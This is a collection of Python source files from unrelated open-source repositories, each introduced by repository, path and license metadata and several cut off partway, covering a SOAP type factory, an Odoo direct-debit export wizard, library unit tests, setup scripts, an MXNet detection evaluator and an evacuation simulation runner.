A factory for instantiating types defined in the wsdl
@ivar resolver: A schema type resolver.
@type resolver: L{PathResolver}
@ivar builder: A schema object builder.
@type builder: L{Builder}
"""
def __init__(self, wsdl):
"""
@param wsdl: A schema object.
@type wsdl: L{wsdl.Definitions}
"""
self.wsdl = wsdl
self.resolver = PathResolver(wsdl)
self.builder = Builder(self.resolver)
def create(self, name):
"""
create a WSDL type by name
@param name: The name of a type defined in the WSDL.
@type name: str
@return: The requested object.
@rtype: L{Object}
"""
timer = metrics.Timer()
timer.start()
type = self.resolver.find(name)
if type is None:
raise TypeNotFound(name)
if type.enum():
result = InstFactory.object(name)
for e, a in type.children():
setattr(result, e.name, e.name)
else:
try:
result = self.builder.build(type)
except Exception, e:
log.error("create '%s' failed", name, exc_info=True)
raise BuildError(name, e)
timer.stop()
metrics.log.debug('%s created: %s', name, timer)
return result
def separator(self, ps):
|
ndtran/l10n-switzerland
|
l10n_ch_lsv_dd/wizard/lsv_export_wizard.py
|
Python
|
agpl-3.0
| 21,814 | 0 |
##############################################################################
#
# Swiss localization Direct Debit module for OpenERP
# Copyright (C) 2014 Compassion (http://www.compassion.ch)
# @author: Cyril Sester <cyril.sester@outlook.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import collections
from openerp import models, fields, api, _, netsvc, exceptions
from datetime import date, datetime, timedelta
from openerp.tools import mod10r, DEFAULT_SERVER_DATE_FORMAT
import logging
logger = logging.getLogger(__name__)
class lsv_export_wizard(models.TransientModel):
''' LSV file generation wizard. This wizard is called
when the "make payment" button on a direct debit order
with payment type "LSV" is pressed
'''
_name = 'lsv.export.wizard'
_description = 'Export LSV Direct Debit File'
treatment_type = fields.Selection(
[('P', _('Production')), ('T', _('Test'))],
_('Treatment type'),
required=True,
default='T' # FIXME for release
)
currency = fields.Selection(
[('CHF', 'CHF'), ('EUR', 'EUR')],
_('Currency'),
required=True,
default='CHF'
)
banking_export_ch_dd_id = fields.Many2one(
'banking.export.ch.dd',
_('LSV file'),
readonly=True
)
file = fields.Binary(
string=_('File'),
related='banking_export_ch_dd_id.file'
)
filename = fields.Char(
string=_('Filename'),
related='banking_export_ch_dd_id.filename',
size=256,
readonly=True
)
nb_transactions = fields.Integer(
string=_('Number of Transactions'),
related='banking_export_ch_dd_id.nb_transactions'
)
total_amount = fields.Float(
string=_('Total Amount'),
related='banking_export_ch_dd_id.total_amount'
)
state = fields.Selection(
[('create', _('Create')), ('finish', _('Finish'))],
_('State'),
readonly=True,
default='create'
)
@api.multi
def generate_lsv_file(self):
''' Generate direct debit export object including the lsv file
content. Called by generate button.
'''
self.ensure_one()
payment_order_obj = self.env['payment.order']
payment_line_obj = self.env['payment.line']
active_ids = self.env.context.get('active_ids', [])
if not active_ids:
raise exceptions.ValidationError(_('No payment order selected'))
payment_order_ids = payment_order_obj.browse(active_ids)
# common properties for all lines
properties = self._setup_properties(payment_order_ids[0])
total_amount = 0.0
lsv_lines = []
for payment_order in payment_order_ids:
total_amount = total_amount + payment_order.total
ben_bank_id = payment_order.mode.bank_id
clean_acc_number = ben_bank_id.acc_number.replace(' ', '')
clean_acc_number = clean_acc_number.replace('-', '')
ben_address = self._get_account_address(ben_bank_id)
properties.update({
'ben_address': ben_address,
'ben_iban': clean_acc_number,
'ben_clearing': self._get_clearing(payment_order.mode.bank_id),
})
if not self._is_ch_li_iban(properties.get('ben_iban')):
raise exceptions.ValidationError(
_('Ben IBAN is not a correct CH or LI IBAN (%s given)') %
properties.get('ben_iban')
)
order_by = ''
if payment_order.date_prefered == 'due':
order_by = 'account_move_line.date_maturity ASC, '
order_by += 'payment_line.bank_id'
# A direct db query is used because order parameter in model.search
# doesn't support function fields
self.env.cr.execute(
'SELECT payment_line.id FROM payment_line, account_move_line '
'WHERE payment_line.move_line_id = account_move_line.id '
'AND payment_line.order_id = %s '
'ORDER BY ' + order_by, (payment_order.id,))
sorted_line_ids = [row[0] for row in self.env.cr.fetchall()]
payment_lines = payment_line_obj.browse(sorted_line_ids)
for line in payment_lines:
if not line.mandate_id or not line.mandate_id.state == "valid":
raise exceptions.ValidationError(
_('Line with ref %s has no associated valid mandate') %
line.name
)
# Payment line is associated to generated line to make
# customizing easier.
lsv_lines.append((line, self._generate_debit_line(
line, properties, payment_order)))
properties.update({'seq_nb': properties['seq_nb'] + 1})
lsv_lines.append((None, self._generate_total_line(properties,
total_amount)))
lsv_lines = self._customize_lines(lsv_lines, properties)
file_content = ''.join(lsv_lines) # Concatenate all lines
file_content = ''.join(
[ch if ord(ch) < 128 else '?' for ch in file_content])
export_id = self._create_lsv_export(active_ids,
total_amount,
properties,
file_content)
self.write({'banking_export_ch_dd_id': export_id.id,
'state': 'finish'})
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': self._name,
'res_id': self.id,
'target': 'new',
}
return action
@api.model
def _generate_debit_line(self, line, properties, payment_order):
''' Convert each payment_line to lsv debit line '''
deb_acc_number = line.bank_id.acc_number
deb_acc_number = deb_acc_number.replace(' ', '').replace('-', '')
if line.bank_id.state == 'iban' and not self._is_ch_li_iban(
deb_acc_number):
raise exceptions.ValidationError(
            _('Line with ref %s does not have a correct CH or LI IBAN '
              '(%s given)') % (line.name, deb_acc_number)
)
vals = collections.OrderedDict()
vals['TA'] = '875'
vals['VNR'] = '0'
vals['VART'] = properties.get('treatment_type', 'P')
vals['GVDAT'] = self._prepare_date(
self._get_treatment_date(payment_order.date_prefered,
line.ml_maturity_date,
payment_order.date_scheduled,
line.name))
vals['BCZP'] = self._complete_line(
self._get_clearing(line.bank_id), 5)
vals['EDAT'] = properties.get('edat')
        vals['BCZE'] = self._complete_line(properties.get('ben_clearing'), 5)
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESE
|
Elastica/kombu
|
kombu/tests/utils/test_utils.py
|
Python
|
bsd-3-clause
| 10,301 | 0 |
from __future__ import absolute_import, unicode_literals
import pickle
from io import StringIO, BytesIO
from kombu import version_info_t
from kombu import utils
from kombu.five import python_2_unicode_compatible
from kombu.utils.text import version_string_as_tuple
from kombu.tests.case import Case, Mock, patch, mock
@python_2_unicode_compatible
class OldString(object):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def split(self, *args, **kwargs):
return self.value.split(*args, **kwargs)
def rsplit(self, *args, **kwargs):
return self.value.rsplit(*args, **kwargs)
class test_kombu_module(Case):
def test_dir(self):
import kombu
self.assertTrue(dir(kombu))
class test_utils(Case):
def test_maybe_list(self):
self.assertEqual(utils.maybe_list(None), [])
self.assertEqual(utils.maybe_list(1), [1])
self.assertEqual(utils.maybe_list([1, 2, 3]), [1, 2, 3])
def test_fxrange_no_repeatlast(self):
self.assertEqual(list(utils.fxrange(1.0, 3.0, 1.0)),
[1.0, 2.0, 3.0])
def test_fxrangemax(self):
self.assertEqual(list(utils.fxrangemax(1.0, 3.0, 1.0, 30.0)),
[1.0, 2.0, 3.0, 3.0, 3.0, 3.0,
3.0, 3.0, 3.0, 3.0, 3.0])
self.assertEqual(list(utils.fxrangemax(1.0, None, 1.0, 30.0)),
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])
def test_reprkwargs(self):
self.assertTrue(utils.reprkwargs({'foo': 'bar', 1: 2, 'k': 'v'}))
def test_reprcall(self):
self.assertTrue(
utils.reprcall('add', (2, 2), {'copy': True}),
)
class test_UUID(Case):
def test_uuid4(self):
self.assertNotEqual(utils.uuid4(),
utils.uuid4())
def test_uuid(self):
i1 = utils.uuid()
i2 = utils.uuid()
self.assertIsInstance(i1, str)
self.assertNotEqual(i1, i2)
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state(Case):
@mock.stdouts
def test_dump(self, stdout, stderr):
fh = MyBytesIO()
utils.emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh)
self.assertDictEqual(
pickle.loads(fh.getvalue()), {'foo': 'bar'})
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
@mock.stdouts
def test_dump_second_strategy(self, stdout, stderr):
fh = MyStringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
utils.emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh, dump=raise_something
)
self.assertIn('foo', fh.getvalue())
self.assertIn('bar', fh.getvalue())
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
class test_retry_over_time(Case):
def setup(self):
self.index = 0
class Predicate(Exception):
pass
def myfun(self):
if self.index < 9:
raise self.Predicate()
return 42
def errback(self, exc, intervals, retries):
interval = next(intervals)
sleepvals = (None, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0, 16.0, 16.0)
self.index += 1
self.assertEqual(interval, sleepvals[self.index])
return interval
@mock.sleepdeprived(module=utils)
def test_simple(self):
prev_count, utils.count = utils.count, Mock()
try:
utils.count.return_value = list(range(1))
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=None, interval_max=14)
self.assertIsNone(x)
utils.count.return_value = list(range(10))
cb = Mock()
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=self.errback, callback=cb,
interval_max=14)
self.assertEqual(x, 42)
self.assertEqual(self.index, 9)
cb.assert_called_with()
finally:
utils.count = prev_count
@mock.sleepdeprived(module=utils)
def test_retry_once(self):
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=self.errback, interval_max=14,
)
self.assertEqual(self.index, 1)
# no errback
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=None, interval_max=14,
)
@mock.sleepdeprived(module=utils)
def test_retry_always(self):
Predicate = self.Predicate
class Fun(object):
def __init__(self):
self.calls = 0
def __call__(self, *args, **kwargs):
try:
if self.calls >= 10:
return 42
raise Predicate()
finally:
self.calls += 1
fun = Fun()
self.assertEqual(
utils.retry_over_time(
fun, self.Predicate,
max_retries=0, errback=None, interval_max=14,
),
42,
)
self.assertEqual(fun.calls, 11)
class test_cached_property(Case):
def test_deleting(self):
class X(object):
xx = False
@utils.cached_property
def foo(self):
return 42
@foo.deleter # noqa
def foo(self, value):
self.xx = value
x = X()
del(x.foo)
self.assertFalse(x.xx)
x.__dict__['foo'] = 'here'
del(x.foo)
self.assertEqual(x.xx, 'here')
def test_when_access_from_class(self):
class X(object):
xx = None
@utils.cached_property
def foo(self):
return 42
@foo.setter # noqa
def foo(self, value):
self.xx = 10
desc = X.__dict__['foo']
self.assertIs(X.foo, desc)
self.assertIs(desc.__get__(None), desc)
self.assertIs(desc.__set__(None, 1), desc)
self.assertIs(desc.__delete__(None), desc)
self.assertTrue(desc.setter(1))
x = X()
x.foo = 30
self.assertEqual(x.xx, 10)
del(x.foo)
class test_symbol_by_name(Case):
def test_instance_returns_instance(self):
instance = object()
self.assertIs(utils.symbol_by_name(instance), instance)
def test_returns_default(self):
default = object()
self.assertIs(
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz', default=default),
default,
)
def test_no_default(self):
with self.assertRaises(ImportError):
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz')
def test_imp_reraises_ValueError(self):
imp = Mock()
imp.side_effect = ValueError()
with self.assertRaises(ValueError):
utils.symbol_by_name('kombu.Connection', imp=imp)
def test_package(self):
from kombu.entity import Exchange
self.assertIs(
utils.symbol_by_name('.entity:Exchange', package='kombu'),
Exchange,
)
self.assertTrue(utils.symbol_by_name(':Consumer', package='kombu'))
class test_ChannelPromise(Case):
def test_repr(self):
obj = Mock(name='cb')
self.assertIn(
'promise',
repr(utils.ChannelPromise(obj)),
)
obj.assert_not_called()
class test_entrypoints(Case):
@mock.mask_modules('pkg_resources')
def test_without_pkg_resources(self):
self.assertListEqual(list(utils.entrypoints('kombu.test')), [])
@mock.module_exists('pkg_resources')
def test_with_pkg_resources(self):
with patch('pkg_resources.
|
rainmakeross/python-dataanalysis
|
app.py
|
Python
|
apache-2.0
| 871 | 0.005741 |
from mongoengine import *
from models.zips import Zips
from geopy import distance
from geopy import Point
connect('scratch', host='mongodb://142.133.150.180/scratch')
# zipins = Zips(zipcode=999999, city="testlocation", loc=[1.0,1.0],pop=12345, state="ZZ").save()
locationList = []
location = {}
distanceList = []
for zip in Zips.objects:
locationList.append(zip)
for location1 in locationList:
if location1.city=="BEVERLY HILLS" :
        point1 = Point(location1.loc[0], location1.loc[1])
for location2 in locationList:
if location1 != location2 and location2.city !="BEVERLY HILLS":
point2 = Point(location2.loc[0], location2.loc[1])
if(distance.distance(point1, point2) < 5):
distanceList.append(location2)
for location in distanceList:
print (location.city, location.zipcode)
|
tzangms/iloveck101
|
setup.py
|
Python
|
mit
| 662 | 0.006042 |
from setuptools import setup
license = open('LICENSE.txt').read()
setup(
    name='iloveck101',
version='0.5.2',
author='tzangms',
author_email='tzangms@gmail.com',
packages=['iloveck101'],
url='https://github.com/tzangms/iloveck101',
license=license,
description='Download images from ck101 thread',
test_suite='tests',
long_description=open('README.md').read(),
entry_points = {
'console_scripts': [
'iloveck101 = iloveck101.iloveck101:main',
]
},
install_requires = [
"lxml==3.2.4",
"requests==2.0.1",
"gevent==1.0",
"more-itertools==2.2",
],
)
|
JensTimmerman/radical.pilot
|
src/radical/pilot/__init__.py
|
Python
|
mit
| 1,882 | 0.020723 |
#pylint: disable=C0301, C0103, W0212, W0401
"""
.. module:: pilot
:platform: Unix
:synopsis: RADICAL-Pilot is a distributed Pilot-Job framework.
.. moduleauthor:: Ole Weidner <ole.weidner@rutgers.edu>
"""
__copyright__ = "Copyright 2013-2014, http://radical.rutgers.edu"
__license__ = "MIT"
# ------------------------------------------------------------------------------
# Scheduler name constant
from types import *
from states import *
from logentry import *
from scheduler import *
# ------------------------------------------------------------------------------
#
from url import Url
from exceptions import *
from session import Session
from context import Context
from unit_manager import UnitManager
from compute_unit import ComputeUnit
from compute_unit_description import ComputeUnitDescription
from pilot_manager import PilotManager
from compute_pilot import ComputePilot
from compute_pilot_description import ComputePilotDescription
from resource_config import ResourceConfig
from staging_directives import COPY, LINK, MOVE, TRANSFER, SKIP_FAILED, CREATE_PARENTS
# ------------------------------------------------------------------------------
#
from utils.logger import logger
import os
import radical.utils as ru
import radical.utils.logger as rul
pwd = os.path.dirname (__file__)
root = "%s/.." % pwd
version, version_detail, version_branch, sdist_name, sdist_path = ru.get_version ([root, pwd])
# FIXME: the logger init will require a 'classical' ini based config, which is
# different from the json based config we use now. May need updating once the
# radical configuration system has changed to json
_logger = rul.logger.getLogger ('radical.pilot')
_logger.info ('radical.pilot version: %s' % version_detail)
# ------------------------------------------------------------------------------
|
GregHilmes/pokebase
|
tests/test_module_loaders.py
|
Python
|
bsd-3-clause
| 1,399 | 0.004289 |
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch
from hypothesis import given
from hypothesis.strategies import integers
from pokebase import APIResource, loaders
from pokebase.common import ENDPOINTS
def builder(func, func_name):
@given(id_=integers(min_value=1))
@patch('pokebase.interface.get_data')
def test(self, mock_get_data, id_):
mock_get_data.side_effect = [{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]},
{'simple_attr': 10, 'list_attr': [{'name': 'mocked name'}], 'complex_attr': {'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, 10)}},
{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}]
self.assertIsInstance(func(id_), APIResource)
return test
class TestFunctions_loaders(unittest.TestCase):
@classmethod
def setUpClass(cls):
for endpoint in ENDPOINTS:
if endpoint in ['type']:
# special cases, need trailing underscore
func_name = ''.join([endpoint.replace('-', '_'), '_'])
else:
                func_name = endpoint.replace('-', '_')
func = getattr(loaders, func_name)
setattr(cls, 'testLoader_{}'.format(func_name), builder(func, endpoint))
TestFunctions_loaders.setUpClass()
|
zhreshold/mxnet-ssd
|
evaluate/evaluate_net.py
|
Python
|
mit
| 3,901 | 0.003076 |
from __future__ import print_function
import os
import sys
import importlib
import mxnet as mx
from dataset.iterator import DetRecordIter
from config.config import cfg
from evaluate.eval_metric import MApMetric, VOC07MApMetric
import logging
from symbol.symbol_factory import get_symbol
def evaluate_net(net, path_imgrec, num_classes, mean_pixels, data_shape,
model_prefix, epoch, ctx=mx.cpu(), batch_size=1,
path_imglist="", nms_thresh=0.45, force_nms=False,
ovp_thresh=0.5, use_difficult=False, class_names=None,
voc07_metric=False, frequent=20):
"""
    evaluate network given a validation record file
Parameters:
----------
net : str or None
Network name or use None to load from json without modifying
path_imgrec : str
path to the record validation file
path_imglist : str
path to the list file to replace labels in record file, optional
num_classes : int
number of classes, not including background
mean_pixels : tuple
(mean_r, mean_g, mean_b)
data_shape : tuple or int
(3, height, width) or height/width
model_prefix : str
model prefix of saved checkpoint
epoch : int
load model epoch
ctx : mx.ctx
mx.gpu() or mx.cpu()
batch_size : int
validation batch size
nms_thresh : float
non-maximum suppression threshold
force_nms : boolean
whether suppress different class objects
ovp_thresh : float
        AP overlap threshold for true/false positives
use_difficult : boolean
whether to use difficult objects in evaluation if applicable
class_names : comma separated str
class names in string, must correspond to num_classes if set
voc07_metric : boolean
        whether to use 11-point evaluation as in VOC07 competition
frequent : int
frequency to print out validation status
"""
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# args
if isinstance(data_shape, int):
data_shape = (3, data_shape, data_shape)
assert len(data_shape) == 3 and data_shape[0] == 3
#model_prefix += '_' + str(data_shape[1])
# iterator
eval_iter = DetRecordIter(path_imgrec, batch_size, data_shape,
path_imglist=path_imglist, **cfg.valid)
# model params
load_net, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
# network
if net is None:
net = load_net
else:
net = get_symbol(net, data_shape[1], num_classes=num_classes,
nms_thresh=nms_thresh, force_suppress=force_nms)
if not 'label' in net.list_arguments():
label = mx.sym.Variable(name='label')
net = mx.sym.Group([net, label])
# init module
    mod = mx.mod.Module(net, label_names=('label',), logger=logger, context=ctx,
fixed_param_names=net.list_arguments())
mod.bind(data_shapes=eval_iter.provide_data, label_shapes=eval_iter.provide_label)
mod.set_params(args, auxs, allow_missing=False, force_init=True)
# run evaluation
if voc07_metric:
metric = VOC07MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
else:
metric = MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
results = mod.score(eval_iter, metric, num_batch=None,
batch_end_callback=mx.callback.Speedometer(batch_size,
frequent=frequent,
auto_reset=False))
for k, v in results:
print("{}: {}".format(k, v))
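# Usage sketch (network name, paths and class list below are hypothetical):
#   evaluate_net('vgg16_reduced', 'data/val.rec', num_classes=20,
#                mean_pixels=(123, 117, 104), data_shape=300,
#                model_prefix='model/ssd', epoch=0, ctx=mx.gpu(0),
#                class_names='aeroplane, bicycle, bird'.split(', '),
#                voc07_metric=True)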
|
ucoin-io/cutecoin
|
update_ts.py
|
Python
|
mit
| 1,724 | 0.00174 |
import sys, os, multiprocessing, subprocess, time
src = os.path.abspath(os.path.join(os.path.dirname(__file__), 'src', 'sakia'))
res = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res'))
pro_file_template = """
FORMS = {0}
SOURCES = {1}
TRANSLATIONS = {2}
"""
def generate_pro():
sources = []
forms = []
translations = []
project_filename = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"sakia-ts-{0}".format(int(time.time()))))
for root, dirs, files in os.walk(src):
for f in files:
            if f.endswith('.py') and not f.endswith('_uic.py'):
sources.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
for root, dirs, files in os.walk(res):
for f in files:
if f.endswith('.ui'):
forms.append(os.path.join(root, f))
elif f.endswith('.ts'):
translations.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
with open(project_filename, 'w') as outfile:
outfile.write(pro_file_template.format(""" \\
""".join(forms),
""" \\
""".join(sources),
""" \\
""".join(translations)))
return project_filename
pro_file = generate_pro()
try:
if "-noobsolete" in sys.argv:
print("Removing obsolete strings...")
subprocess.call(["pylupdate5", "-noobsolete", pro_file])
else:
subprocess.call(["pylupdate5", pro_file])
finally:
os.remove(pro_file)
|
gsi-upm/soba
|
projects/seba/run.py
|
Python
|
mit
| 3,404 | 0.016745 |
from soba.models.continuousModel import ContinuousModel
import soba.visualization.ramen.mapGenerator as ramen
import soba.run
from collections import OrderedDict
import json
from time import time
import sys
from model import SEBAModel
from visualization.back import Visualization
import datetime as dt
aStar = False
strategies = ['nearest', 'safest', 'uncrowded']
# Simulation configuration
today = dt.date.today()
timeHazard = "10:30:00"
#Only two are necessary
families = [{'N': 4, 'child': 2, 'adult': 2}]
sebaConfiguration = {'families': [], 'hazard': timeHazard}
# Occupancy attributes
jsonsOccupants = []
strategy = strategies[0]
N = 40
NDis = 0
fov = True
speed = 1.38
speedDis = 0.7
#states = OrderedDict([('Free time','out'), ('Rest', 'wp'), ('Lunch','out'), ('Work', 'wp')])
states = OrderedDict([('Free time','out'), ('Lunch','out'), ('Work', 'wp')])
schedule = {'t1': "09:00:00", 't2': "10:00:00", 't3': "11:00:00", 't4': "18:00:00"}
variation = {'t1': "00:50:00", 't2': "00:30:00", 't3': "00:30:00", 't4': "00:59:00"}
markovActivity = {
'-t1': [[100, 0, 0], [100, 0, 0], [100, 0, 0], [100, 0, 0]],
't1-t2': [[0, 0, 70], [0, 0, 90], [0, 0, 80], [0, 0, 60]],
't2-t3': [[100, 0, 0], [0, 20, 60], [20, 50, 40], [0, 70, 30]],
't3-t4': [[100, 0, 0], [0, 20, 60], [0, 0, 70], [20, 0, 70]],
't4-': [[100, 0, 0], [70, 0, 30], [70, 0, 30], [70, 0, 30]]
}
timeActivity = {
'-t1': [3, 0, 0], 't1-t2': [0, 0, 45], 't2-t3': [0, 50, 45], 't3-t4': [0, 20, 45], 't4-': [3, 10, 20]
}
timeActivityVariation = {
'-t1': [0, 0, 0], 't1-t2': [0, 0, 10], 't2-t3': [0, 10, 10], 't3-t4': [0, 5, 10], 't4-': [0,5, 10]
}
jsonOccupant = {'type': 'regular' , 'astar': aStar, 'N': N, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speed, 'shape': 'rect', 'fov': fov}
jsonsOccupants.append(jsonOccupant)
jsonOccupantDis = {'type': 'dis' , 'astar': aStar, 'N': NDis, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speedDis, 'fov': fov}
jsonsOccupants.append(jsonOccupantDis)
#with open('auxiliarFiles/labgsi.blueprint3d') as data_file:
# jsonMap = ramen.returnMap(data_file, offsety = 9, offsetx = 0)
#cellW = 20
#cellH = 20
#with open('auxiliarFiles/uclm_furniture1_new.blueprint3d') as data_file:
#jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
#cellW = 113
#cellH = 80
with open('auxiliarFiles/uclm_furniture2_new.blueprint3d') as data_file:
jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
cellW = 113
cellH = 80
if len(sys.argv) > 1 and sys.argv[1] == '-v':
back = Visualization(cellW, cellH)
parameters = {'width': cellW, 'height': cellH, 'jsonMap': jsonMap, 'jsonsOccupants': jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
soba.run.run(SEBAModel, parameters, visualJS="visualization/front.js", back=back)
else:
fixed_params = {"width": cellW, "height": cellH, "jsonMap": jsonMap, "jsonsOccupants": jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
variable_params = {"seed": range(10, 500, 10)}
soba.run.run(SEBAModel, fixed_params, variable_params)
|
webgovernor/gitgate
|
setup.py
|
Python
|
mit
| 856 | 0.031542 |
#!/usr/bin/env python
"""
Copyright (c) 2012, Aaron Meier
All rights reserved.
See LICENSE for more information.
"""
from distutils.core import setup
import os
from gitgate import __version__
setup(name='gitgate',
version = __version__,
description = 'Dead simple gatekeeping code review for Git',
long_description = (
"GitGate provides a GUI frontend (via Flask) for pre-merge code review."
),
author = 'Aaron Meier',
author_email = 'webgovernor@gmail.com',
packages = ['gitgate'],
    package_dir={'gitgate':'gitgate'},
package_data={'gitgate':['templates/*', 'static/bootstrap3/*/*', 'static/jquery/*.js']},
scripts=['gitgate/scripts/gitgate'],
url = 'http://gitgate.nullism.com',
    install_requires = ['peewee>=2.2.3', 'flask>=0.9', 'argparse>=1'],
license = 'MIT',
provides = ['gitgate']
)
|
et-al-Health/parserator
|
parserator/spotcheck.py
|
Python
|
mit
| 3,434 | 0.004659 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from builtins import zip
import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
    whenever the two taggers parse a string differently. This is for spot-checking models.
    :param model1: a .crfsuite filename
    :param model2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print('\n')
print("%s. %s" %(count_discrepancies, string))
print('-'*75)
print_spaced('token', model1, model2)
print('-'*75)
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print("\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list)))
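# Usage sketch (model filenames, strings and module name are hypothetical):
#   compareTaggers('learned_v1.crfsuite', 'learned_v2.crfsuite',
#                  ['123 Main St.', '45 Elm Ave.'], 'usaddress')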
def print_spaced(s1, s2, s3):
n = 25
print(s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3)
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = list(zip(*components))
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_both += 1
elif (tags1 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("%s: "%model2, tags2)
wrong_count_1 += 1
elif (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("%s: "%model1, tags1)
            print("*%s: "%model2, tags2)
wrong_count_2 += 1
else:
correct_count += 1
print("\n\nBOTH WRONG: ", wrong_count_both)
print("%s WRONG: %s" %(model1, wrong_count_1))
print("%s WRONG: %s" %(model2, wrong_count_2))
print("BOTH CORRECT: ", correct_count)
|
ftl/dxpad
|
tests/test_contest.py
|
Python
|
mit
| 3,821 | 0.001309 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath('..'))
import dxpad._contest as _contest
class SignalMonitor:
signal_received = False
signal_value = None
def __init__(self, signal):
signal.connect(self.signal_receiver)
def signal_receiver(self, value = None):
self.signal_received = True
self.signal_value = value
class TestCurrentQso(unittest.TestCase):
def test_create(self):
qso = _contest.CurrentQso(_contest.Exchange())
def test_next_increases_serial(self):
qso = _contest.CurrentQso(_contest.Exchange())
qso.next()
self.assertEqual(qso.serial, 2)
def test_next_updates_exchange_out(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
qso.next()
self.assertEqual(exchange.serial, 124)
def test_next_clears_inputs(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call = "the call"
qso.exchange_in = "the exchange in"
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
qso.next()
self.assertEqual(qso.call, "")
self.assertEqual(qso.exchange_in, "")
self.assertFalse(qso.call_valid)
self.assertFalse(qso.exchange_in_valid)
self.assertFalse(qso.complete)
def test_next_emits_changed_invalid_and_incomplete(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
monitor_changed = SignalMonitor(qso.changed)
monitor_call = SignalMonitor(qso.call_is_valid)
monitor_exchange_in = SignalMonitor(qso.exchange_in_is_valid)
monitor_complete = SignalMonitor(qso.completed)
qso.next()
self.assertTrue(monitor_changed.signal_received)
self.assertTrue(monitor_call.signal_received)
self.assertFalse(monitor_call.signal_value)
self.assertTrue(monitor_exchange_in.signal_received)
self.assertFalse(monitor_exchange_in.signal_value)
self.assertTrue(monitor_complete.signal_received)
